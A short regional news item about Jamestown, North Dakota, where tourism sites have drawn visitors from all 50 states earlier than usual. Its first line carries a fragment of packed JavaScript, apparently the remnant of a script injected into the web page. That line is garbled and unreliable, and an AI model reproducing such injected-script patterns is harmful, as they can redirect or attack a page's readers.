JAMESTOWN zeiya|var|u0026u|referrer|kbbak||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – Jamestown’s main tourism sites on ‘the hill’ have already had visitors from all 50 states this year says Nina Schneider, executive director of the Buffalo City Tourism Foundation. Usually that feat is not accomplished until late July or August.
Schneider says they are nearly on pace to match Jamestown’s record tourism numbers from 2010. She attributes the high numbers to several factors, including the early spring and the growth in western North Dakota.
Schneider says they are accurately able to monitor tourist visits to ‘the hill,’ which includes the Frontier Village, the National Buffalo Museum and the Buffalo Monument.
